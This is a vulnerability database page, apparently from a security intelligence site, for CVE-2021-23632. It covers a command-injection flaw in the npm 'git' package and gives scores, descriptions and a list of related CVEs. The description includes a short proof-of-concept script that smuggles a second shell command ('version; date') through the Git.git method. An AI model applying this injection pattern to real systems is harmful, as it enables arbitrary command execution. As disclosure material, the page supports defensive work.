Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-23632— Remote Code Execution (RCE)

CVSS 6.6 · Medium EPSS 3.40% · P87
Get alerts for future matching vulnerabilitiesLog in to subscribe

I. Basic Information for CVE-2021-23632

Vulnerability Information
Have questions about the vulnerability? See if Shenlong's analysis helps!
View Shenlong Deep Dive ↗

Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.

Vulnerability Title
Remote Code Execution (RCE)
Source: NVD (National Vulnerability Database)
Vulnerability Description
All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.
Source: NVD (National Vulnerability Database)
CVSS Information
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
Source: NVD (National Vulnerability Database)
Vulnerability Type
N/A
Source: NVD (National Vulnerability Database)
Vulnerability Title
Github Git 操作系统命令注入漏洞
Source: CNNVD (China National Vulnerability Database)
Vulnerability Description
Github Git是一套免费、开源的分布式版本控制系统。 Github Git 存在操作系统命令注入漏洞,该漏洞源于 Git.git 方法中缺少清理功能,允许执行操作系统命令而不仅仅是git命令。该漏洞影响以下产品:Git 所有版本。
Source: CNNVD (China National Vulnerability Database)
CVSS Information
N/A
Source: CNNVD (China National Vulnerability Database)
Vulnerability Type
N/A
Source: CNNVD (China National Vulnerability Database)

Affected Products

VendorProductAffected VersionsCPESubscribe
-git 0 ~ unspecified -

II. Public POCs for CVE-2021-23632

#POC DescriptionSource LinkShenlong Link
AI-Generated POCPremium

No public POC found.

Login to generate AI POC

III. Intelligence Information for CVE-2021-23632

登录查看更多情报信息。

Same Patch Batch · n/a · 2022-03-17 · 36 CVEs total

CVE-2022-07489.8 CRITICALArbitrary Code Execution
CVE-2022-253548.6 HIGHPrototype Pollution
CVE-2022-253527.5 HIGHPrototype Pollution
CVE-2022-07497.4 HIGHDeserialization of Untrusted Data
CVE-2022-257607.1 HIGHArbitrary Code Injection
CVE-2021-237716.5 MEDIUMSandbox Bypass
CVE-2021-235566.4 MEDIUMExposed Dangerous Method or Function
CVE-2022-252966.3 MEDIUMPrototype Pollution
CVE-2022-212215.9 MEDIUMDirectory Traversal
CVE-2020-15591F*EX 代码注入漏洞
CVE-2021-44260WAVLINK AC1200 访问控制错误漏洞
CVE-2022-26503Veeam Agent for Windows 代码问题漏洞
CVE-2022-25364Gradle 安全漏洞
CVE-2021-45040Spatie Laravel Media Library Pro 代码问题漏洞
CVE-2022-26501Veeam Backup&Replication 访问控制错误漏洞
CVE-2021-46107Ligeo Archives 代码问题漏洞
CVE-2022-26504Veeam Backup&Replication 授权问题漏洞
CVE-2022-26500Veeam Backup&Replication 路径遍历漏洞
CVE-2022-24302Paramiko 竞争条件问题漏洞
CVE-2021-44088Attendance and Payroll System SQL注入漏洞

Showing top 20 of 36 CVEs. View all on vendor page → →

IV. Related Vulnerabilities

Same product: git
Same vendor: n/a

V. Comments for CVE-2021-23632

No comments yet

Leave a comment